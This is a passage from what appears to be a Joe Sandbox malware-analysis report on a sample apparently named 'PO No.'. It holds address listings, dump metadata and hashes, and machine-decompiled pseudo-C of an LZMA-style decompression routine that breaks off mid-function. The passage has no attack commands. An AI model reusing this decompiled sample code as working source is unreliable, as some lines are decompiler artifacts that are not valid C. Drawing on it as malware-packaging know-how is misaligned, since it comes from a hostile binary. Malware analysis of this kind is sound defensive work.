                                                                      0x00406de2
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00406e06
                                                                      0x00406e0a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e10
                                                                      0x00406e14
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e1a
                                                                      0x00406e1c
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e23
                                                                      0x00406e27
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406ea2
                                                                      0x00406ea9
                                                                      0x00406eac
                                                                      0x00406eaf
                                                                      0x00406ea4
                                                                      0x00406ea4
                                                                      0x00406ea4
                                                                      0x00406eb2
                                                                      0x00406eb5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f5e
                                                                      0x00406f5e
                                                                      0x00406f62
                                                                      0x00407300
                                                                      0x00000000
                                                                      0x00407300
                                                                      0x00406f68
                                                                      0x00406f6b
                                                                      0x00406f6e
                                                                      0x00406f72
                                                                      0x00406f75
                                                                      0x00406f7b
                                                                      0x00406f7d
                                                                      0x00406f7d
                                                                      0x00406f7d
                                                                      0x00406f80
                                                                      0x00406f83
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b53
                                                                      0x00406b53
                                                                      0x00406b57
                                                                      0x004072c4
                                                                      0x00000000
                                                                      0x004072c4
                                                                      0x00406b5d
                                                                      0x00406b60
                                                                      0x00406b63
                                                                      0x00406b67
                                                                      0x00406b6a
                                                                      0x00406b70
                                                                      0x00406b72
                                                                      0x00406b72
                                                                      0x00406b72
                                                                      0x00406b75
                                                                      0x00406b78
                                                                      0x00406b78
                                                                      0x00406b7b
                                                                      0x00406b7e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b84
                                                                      0x00406b8a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b90
                                                                      0x00406b90
                                                                      0x00406b94
                                                                      0x00406b97
                                                                      0x00406b9a
                                                                      0x00406b9d
                                                                      0x00406ba0
                                                                      0x00406ba1
                                                                      0x00406ba4
                                                                      0x00406ba6
                                                                      0x00406bac
                                                                      0x00406baf
                                                                      0x00406bb2
                                                                      0x00406bb5
                                                                      0x00406bb8
                                                                      0x00406bbb
                                                                      0x00406bbe
                                                                      0x00406bda
                                                                      0x00406bdd
                                                                      0x00406be0
                                                                      0x00406be3
                                                                      0x00406bea
                                                                      0x00406bee
                                                                      0x00406bf0
                                                                      0x00406bf4
                                                                      0x00406bc0
                                                                      0x00406bc0
                                                                      0x00406bc4
                                                                      0x00406bcc
                                                                      0x00406bd1
                                                                      0x00406bd3
                                                                      0x00406bd5
                                                                      0x00406bd5
                                                                      0x00406bf7
                                                                      0x00406bfe
                                                                      0x00406c01
                                                                      0x00000000
                                                                      0x00406c07
                                                                      0x00000000
                                                                      0x00406c07
                                                                      0x00000000
                                                                      0x00406c0c
                                                                      0x00406c0c
                                                                      0x00406c10
                                                                      0x004072d0
                                                                      0x00000000
                                                                      0x004072d0
                                                                      0x00406c16
                                                                      0x00406c19
                                                                      0x00406c1c
                                                                      0x00406c20
                                                                      0x00406c23
                                                                      0x00406c29
                                                                      0x00406c2b
                                                                      0x00406c2b
                                                                      0x00406c2b
                                                                      0x00406c2e
                                                                      0x00406c31
                                                                      0x00406c31
                                                                      0x00406c31
                                                                      0x00406c37
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c39
                                                                      0x00406c3c
                                                                      0x00406c3f
                                                                      0x00406c42
                                                                      0x00406c45
                                                                      0x00406c48
                                                                      0x00406c4b
                                                                      0x00406c4e
                                                                      0x00406c51
                                                                      0x00406c54
                                                                      0x00406c57
                                                                      0x00406c6f
                                                                      0x00406c72
                                                                      0x00406c75
                                                                      0x00406c78
                                                                      0x00406c78
                                                                      0x00406c7b
                                                                      0x00406c7f
                                                                      0x00406c81
                                                                      0x00406c59
                                                                      0x00406c59
                                                                      0x00406c61
                                                                      0x00406c66
                                                                      0x00406c68
                                                                      0x00406c6a
                                                                      0x00406c6a
                                                                      0x00406c84
                                                                      0x00406c8b
                                                                      0x00406c8e
                                                                      0x00000000
                                                                      0x00406c90
                                                                      0x00000000
                                                                      0x00406c90
                                                                      0x00406c8e
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cd0
                                                                      0x00406cd0
                                                                      0x00406cd4
                                                                      0x004072dc
                                                                      0x00000000
                                                                      0x004072dc
                                                                      0x00406cda
                                                                      0x00406cdd
                                                                      0x00406ce0
                                                                      0x00406ce4
                                                                      0x00406ce7
                                                                      0x00406ced
                                                                      0x00406cef
                                                                      0x00406cef
                                                                      0x00406cef
                                                                      0x00406cf2
                                                                      0x00406cf5
                                                                      0x00406cf5
                                                                      0x00406cfb
                                                                      0x00406c99
                                                                      0x00406c99
                                                                      0x00406c9c
                                                                      0x00000000
                                                                      0x00406c9c
                                                                      0x00406cfd
                                                                      0x00406cfd
                                                                      0x00406d00
                                                                      0x00406d03
                                                                      0x00406d06
                                                                      0x00406d09
                                                                      0x00406d0c
                                                                      0x00406d0f
                                                                      0x00406d12
                                                                      0x00406d15
                                                                      0x00406d18
                                                                      0x00406d1b
                                                                      0x00406d33
                                                                      0x00406d36
                                                                      0x00406d39
                                                                      0x00406d3c
                                                                      0x00406d3c
                                                                      0x00406d3f
                                                                      0x00406d43
                                                                      0x00406d45
                                                                      0x00406d1d
                                                                      0x00406d1d
                                                                      0x00406d25
                                                                      0x00406d2a
                                                                      0x00406d2c
                                                                      0x00406d2e
                                                                      0x00406d2e
                                                                      0x00406d48
                                                                      0x00406d4f
                                                                      0x00406d52
                                                                      0x00000000
                                                                      0x00406d54
                                                                      0x00000000
                                                                      0x00406d54
                                                                      0x00000000
                                                                      0x00406fe1
                                                                      0x00406fe1
                                                                      0x00406fe5
                                                                      0x0040730c
                                                                      0x00000000
                                                                      0x0040730c
                                                                      0x00406feb
                                                                      0x00406fee
                                                                      0x00406ff1
                                                                      0x00406ff5
                                                                      0x00406ff8
                                                                      0x00406ffe
                                                                      0x00407000
                                                                      0x00407000
                                                                      0x00407000
                                                                      0x00407003
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070f0
                                                                      0x004070f4
                                                                      0x00407116
                                                                      0x00407119
                                                                      0x00407123
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x004070f6
                                                                      0x004070f9
                                                                      0x004070fd
                                                                      0x00407100
                                                                      0x00407100
                                                                      0x00407103
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071ad
                                                                      0x004071b1
                                                                      0x004071cf
                                                                      0x004071cf
                                                                      0x004071cf
                                                                      0x004071d6
                                                                      0x004071dd
                                                                      0x004071e4
                                                                      0x004071e4
                                                                      0x00000000
                                                                      0x004071e4
                                                                      0x004071b3
                                                                      0x004071b6
                                                                      0x004071b9
                                                                      0x004071bc
                                                                      0x004071c3
                                                                      0x00407107
                                                                      0x00407107
                                                                      0x0040710a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040729e
                                                                      0x004072a1
                                                                      0x004071a2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ed8
                                                                      0x00406eda
                                                                      0x00406ee1
                                                                      0x00406ee2
                                                                      0x00406ee4
                                                                      0x00406ee7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406eef
                                                                      0x00406ef2
                                                                      0x00406ef5
                                                                      0x00406ef7
                                                                      0x00406ef9
                                                                      0x00406ef9
                                                                      0x00406efa
                                                                      0x00406efd
                                                                      0x00406f04
                                                                      0x00406f07
                                                                      0x00406f15
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071eb
                                                                      0x004071eb
                                                                      0x004071ee
                                                                      0x004071f5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071fa
                                                                      0x004071fa
                                                                      0x004071fe
                                                                      0x00407336
                                                                      0x00000000
                                                                      0x00407336
                                                                      0x00407204
                                                                      0x00407207
                                                                      0x0040720a
                                                                      0x0040720e
                                                                      0x00407211
                                                                      0x00407217
                                                                      0x00407219
                                                                      0x00407219
                                                                      0x00407219
                                                                      0x0040721c
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x00407222
                                                                      0x00407222
                                                                      0x00407226
                                                                      0x00407286
                                                                      0x00407289
                                                                      0x0040728e
                                                                      0x0040728f
                                                                      0x00407291
                                                                      0x00407293
                                                                      0x00407296
                                                                      0x004071a2
                                                                      0x004071a2
                                                                      0x00000000
                                                                      0x004071a8
                                                                      0x004071a2
                                                                      0x00407228
                                                                      0x0040722e
                                                                      0x00407231
                                                                      0x00407234
                                                                      0x00407237
                                                                      0x0040723a
                                                                      0x0040723d
                                                                      0x00407240
                                                                      0x00407243
                                                                      0x00407246
                                                                      0x00407249
                                                                      0x00407262
                                                                      0x00407265
                                                                      0x00407268
                                                                      0x0040726b
                                                                      0x0040726f
                                                                      0x00407271
                                                                      0x00407271
                                                                      0x00407272
                                                                      0x00407275
                                                                      0x0040724b
                                                                      0x0040724b
                                                                      0x00407253
                                                                      0x00407258
                                                                      0x0040725a
                                                                      0x0040725d
                                                                      0x0040725d
                                                                      0x00407278
                                                                      0x0040727f
                                                                      0x00000000
                                                                      0x00407281
                                                                      0x00000000
                                                                      0x00407281
                                                                      0x00000000
                                                                      0x00406f1d
                                                                      0x00406f20
                                                                      0x00406f56
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407089
                                                                      0x00407089
                                                                      0x0040708c
                                                                      0x0040708e
                                                                      0x00407318
                                                                      0x00000000
                                                                      0x00407318
                                                                      0x00407094
                                                                      0x00407097
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040709d
                                                                      0x004070a1
                                                                      0x004070a4
                                                                      0x004070a4
                                                                      0x004070a4
                                                                      0x00000000
                                                                      0x004070a4
                                                                      0x00406f22
                                                                      0x00406f24
                                                                      0x00406f26
                                                                      0x00406f28
                                                                      0x00406f2b
                                                                      0x00406f2c
                                                                      0x00406f2e
                                                                      0x00406f30
                                                                      0x00406f33
                                                                      0x00406f36
                                                                      0x00406f4c
                                                                      0x00406f51
                                                                      0x00406f89
                                                                      0x00406f89
                                                                      0x00406f8d
                                                                      0x00406fb9
                                                                      0x00406fbb
                                                                      0x00406fc2
                                                                      0x00406fc5
                                                                      0x00406fc8
                                                                      0x00406fc8
                                                                      0x00406fcd
                                                                      0x00406fcd
                                                                      0x00406fcf
                                                                      0x00406fd2
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00407009
                                                                      0x00407009
                                                                      0x0040700c
                                                                      0x0040700f
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00000000
                                                                      0x00407083
                                                                      0x00407011
                                                                      0x00407017
                                                                      0x0040701a
                                                                      0x0040701d
                                                                      0x00407020
                                                                      0x00407023
                                                                      0x00407026
                                                                      0x00407029
                                                                      0x0040702c
                                                                      0x0040702f
                                                                      0x00407032
                                                                      0x0040704b
                                                                      0x0040704d
                                                                      0x00407050
                                                                      0x00407051
                                                                      0x00407054
                                                                      0x00407056
                                                                      0x00407059
                                                                      0x0040705b
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407062
                                                                      0x00407065
                                                                      0x00407069
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x0040706c
                                                                      0x0040706f
                                                                      0x00407072
                                                                      0x00407034
                                                                      0x00407034
                                                                      0x0040703c
                                                                      0x00407041
                                                                      0x00407043
                                                                      0x00407046
                                                                      0x00407046
                                                                      0x00407075
                                                                      0x0040707c
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x0040707c
                                                                      0x00406f8f
                                                                      0x00406f92
                                                                      0x00406f94
                                                                      0x00406f97
                                                                      0x00406f9a
                                                                      0x00406f9d
                                                                      0x00406f9f
                                                                      0x00406fa2
                                                                      0x00406fa5
                                                                      0x00406fa5
                                                                      0x00406fa8
                                                                      0x00406fa8
                                                                      0x00406fab
                                                                      0x00406fb2
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00406fb2
                                                                      0x00406f38
                                                                      0x00406f3b
                                                                      0x00406f3d
                                                                      0x00406f40
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c9f
                                                                      0x00406c9f
                                                                      0x00406ca3
                                                                      0x004072e8
                                                                      0x00000000
                                                                      0x004072e8
                                                                      0x00406ca9
                                                                      0x00406cac
                                                                      0x00406caf
                                                                      0x00406cb2
                                                                      0x00406cb5
                                                                      0x00406cb8
                                                                      0x00406cbb
                                                                      0x00406cbd
                                                                      0x00406cc0
                                                                      0x00406cc3
                                                                      0x00406cc6
                                                                      0x00406cc8
                                                                      0x00406cc8
                                                                      0x00406cc8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e2a
                                                                      0x00406e2a
                                                                      0x00406e2e
                                                                      0x004072f4
                                                                      0x00000000
                                                                      0x004072f4
                                                                      0x00406e34
                                                                      0x00406e37
                                                                      0x00406e3a
                                                                      0x00406e3d
                                                                      0x00406e3f
                                                                      0x00406e3f
                                                                      0x00406e3f
                                                                      0x00406e42
                                                                      0x00406e45
                                                                      0x00406e48
                                                                      0x00406e4b
                                                                      0x00406e4e
                                                                      0x00406e51
                                                                      0x00406e52
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e57
                                                                      0x00406e5a
                                                                      0x00406e5d
                                                                      0x00406e60
                                                                      0x00406e60
                                                                      0x00406e60
                                                                      0x00406e63
                                                                      0x00406e65
                                                                      0x00406e65
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070ab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070b1
                                                                      0x004070b4
                                                                      0x004070b7
                                                                      0x004070ba
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bf
                                                                      0x004070c2
                                                                      0x004070c5
                                                                      0x004070c8
                                                                      0x004070cb
                                                                      0x004070ce
                                                                      0x004070cf
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d4
                                                                      0x004070d7
                                                                      0x004070da
                                                                      0x004070dd
                                                                      0x004070e0
                                                                      0x004070e4
                                                                      0x004070e6
                                                                      0x004070e9
                                                                      0x00000000
                                                                      0x004070eb
                                                                      0x00406e68
                                                                      0x00406e68
                                                                      0x00000000
                                                                      0x00406e68
                                                                      0x004070e9
                                                                      0x0040731e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040694d
                                                                      0x00407355
                                                                      0x00407355
                                                                      0x00000000
                                                                      0x00407355
                                                                      0x004071a2
                                                                      0x00407129
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00406e7b

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                      • Instruction ID: 968097f9e37e498ed83c4652799cdf8e1ebeb5c7fee57b8dc09d96684c556b9e
                                                                      • Opcode Fuzzy Hash: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                      • Instruction Fuzzy Hash: 27712471E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786996DF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E00406DC3() {
                                                                      				unsigned short _t531;
                                                                      				signed int _t532;
                                                                      				void _t533;
                                                                      				signed int _t534;
                                                                      				signed int _t535;
                                                                      				signed int _t565;
                                                                      				signed int _t568;
                                                                      				signed int _t589;
                                                                      				signed int* _t606;
                                                                      				void* _t613;
                                                                      
                                                                      				L0:
                                                                      				while(1) {
                                                                      					L0:
                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                      						 *(_t613 - 0x84) = 0xa;
                                                                      						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                      					} else {
                                                                      						 *(__ebp - 0x84) = 9;
                                                                      						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                      					}
                                                                      					while(1) {
                                                                      						 *(_t613 - 0x54) = _t606;
                                                                      						while(1) {
                                                                      							L133:
                                                                      							_t531 =  *_t606;
                                                                      							_t589 = _t531 & 0x0000ffff;
                                                                      							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                      							if( *(_t613 - 0xc) >= _t565) {
                                                                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                      								 *(_t613 - 0x40) = 1;
                                                                      								_t532 = _t531 - (_t531 >> 5);
                                                                      								 *_t606 = _t532;
                                                                      							} else {
                                                                      								 *(_t613 - 0x10) = _t565;
                                                                      								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                      								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                      							}
                                                                      							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                      								goto L139;
                                                                      							}
                                                                      							L137:
                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                      								 *(_t613 - 0x88) = 5;
                                                                      								L170:
                                                                      								_t568 = 0x22;
                                                                      								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                      								_t535 = 0;
                                                                      								L172:
                                                                      								return _t535;
                                                                      							}
                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                      							L139:
                                                                      							_t533 =  *(_t613 - 0x84);
                                                                      							while(1) {
                                                                      								 *(_t613 - 0x88) = _t533;
                                                                      								while(1) {
                                                                      									L1:
                                                                      									_t534 =  *(_t613 - 0x88);
                                                                      									if(_t534 > 0x1c) {
                                                                      										break;
                                                                      									}
                                                                      									switch( *((intOrPtr*)(_t534 * 4 +  &M0040735D))) {
                                                                      										case 0:
                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                      												goto L170;
                                                                      											}
                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                      											_t534 =  *( *(_t613 - 0x70));
                                                                      											if(_t534 > 0xe1) {
                                                                      												goto L171;
                                                                      											}
                                                                      											_t538 = _t534 & 0x000000ff;
                                                                      											_push(0x2d);
                                                                      											asm("cdq");
                                                                      											_pop(_t570);
                                                                      											_push(9);
                                                                      											_pop(_t571);
                                                                      											_t609 = _t538 / _t570;
                                                                      											_t540 = _t538 % _t570 & 0x000000ff;
                                                                      											asm("cdq");
                                                                      											_t604 = _t540 % _t571 & 0x000000ff;
                                                                      											 *(_t613 - 0x3c) = _t604;
                                                                      											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                      											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                      											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                      											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                      												L10:
                                                                      												if(_t612 == 0) {
                                                                      													L12:
                                                                      													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                      													goto L15;
                                                                      												} else {
                                                                      													goto L11;
                                                                      												}
                                                                      												do {
                                                                      													L11:
                                                                      													_t612 = _t612 - 1;
                                                                      													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                      												} while (_t612 != 0);
                                                                      												goto L12;
                                                                      											}
                                                                      											if( *(_t613 - 4) != 0) {
                                                                      												GlobalFree( *(_t613 - 4));
                                                                      											}
                                                                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                      											 *(_t613 - 4) = _t534;
                                                                      											if(_t534 == 0) {
                                                                      												goto L171;
                                                                      											} else {
                                                                      												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                      												goto L10;
                                                                      											}
                                                                      										case 1:
                                                                      											L13:
                                                                      											__eflags =  *(_t613 - 0x6c);
                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                      												 *(_t613 - 0x88) = 1;
                                                                      												goto L170;
                                                                      											}
                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                      											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                      											_t45 = _t613 - 0x48;
                                                                      											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                      											__eflags =  *_t45;
                                                                      											L15:
                                                                      											if( *(_t613 - 0x48) < 4) {
                                                                      												goto L13;
                                                                      											}
                                                                      											_t546 =  *(_t613 - 0x40);
                                                                      											if(_t546 ==  *(_t613 - 0x74)) {
                                                                      												L20:
                                                                      												 *(_t613 - 0x48) = 5;
                                                                      												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                      												goto L23;
                                                                      											}
                                                                      											 *(_t613 - 0x74) = _t546;
                                                                      											if( *(_t613 - 8) != 0) {
                                                                      												GlobalFree( *(_t613 - 8));
                                                                      											}
                                                                      											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                      											 *(_t613 - 8) = _t534;
                                                                      											if(_t534 == 0) {
                                                                      												goto L171;
                                                                      											} else {
                                                                      												goto L20;
                                                                      											}
                                                                      										case 2:
                                                                      											L24:
                                                                      											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                      											 *(_t613 - 0x84) = 6;
                                                                      											 *(_t613 - 0x4c) = _t553;
                                                                      											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                      											 *(_t613 - 0x54) = _t606;
                                                                      											goto L133;
                                                                      										case 3:
                                                                      											L21:
                                                                      											__eflags =  *(_t613 - 0x6c);
                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                      												 *(_t613 - 0x88) = 3;
                                                                      												goto L170;
                                                                      											}
                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                      											_t67 = _t613 - 0x70;
                                                                      											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                      											__eflags =  *_t67;
                                                                      											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                      											L23:
                                                                      											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                      											if( *(_t613 - 0x48) != 0) {
                                                                      												goto L21;
                                                                      											}
                                                                      											goto L24;
                                                                      										case 4:
                                                                      											L133:
                                                                      											_t531 =  *_t606;
                                                                      											_t589 = _t531 & 0x0000ffff;
                                                                      											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                      											if( *(_t613 - 0xc) >= _t565) {
                                                                      												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                      												 *(_t613 - 0x40) = 1;
                                                                      												_t532 = _t531 - (_t531 >> 5);
                                                                      												 *_t606 = _t532;
                                                                      											} else {
                                                                      												 *(_t613 - 0x10) = _t565;
                                                                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                      												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                      											}
                                                                      											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                      												goto L139;
                                                                      											}
                                                                      										case 5:
                                                                      											goto L137;
                                                                      										case 6:
                                                                      											__edx = 0;
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												__eax =  *(__ebp - 4);
                                                                      												__ecx =  *(__ebp - 0x38);
                                                                      												 *(__ebp - 0x34) = 1;
                                                                      												 *(__ebp - 0x84) = 7;
                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                      												while(1) {
                                                                      													 *(_t613 - 0x54) = _t606;
                                                                      													goto L133;
                                                                      												}
                                                                      											}
                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                      											__esi =  *(__ebp - 0x60);
                                                                      											__cl = 8;
                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                      											__ecx =  *(__ebp - 4);
                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                      													_t98 = __ebp - 0x38;
                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                      													__eflags =  *_t98;
                                                                      												} else {
                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                      												}
                                                                      											} else {
                                                                      												 *(__ebp - 0x38) = 0;
                                                                      											}
                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                      												__ebx = 0;
                                                                      												__ebx = 1;
                                                                      												goto L61;
                                                                      											} else {
                                                                      												__eax =  *(__ebp - 0x14);
                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                      													__eflags = __eax;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 8);
                                                                      												__ebx = 0;
                                                                      												__ebx = 1;
                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
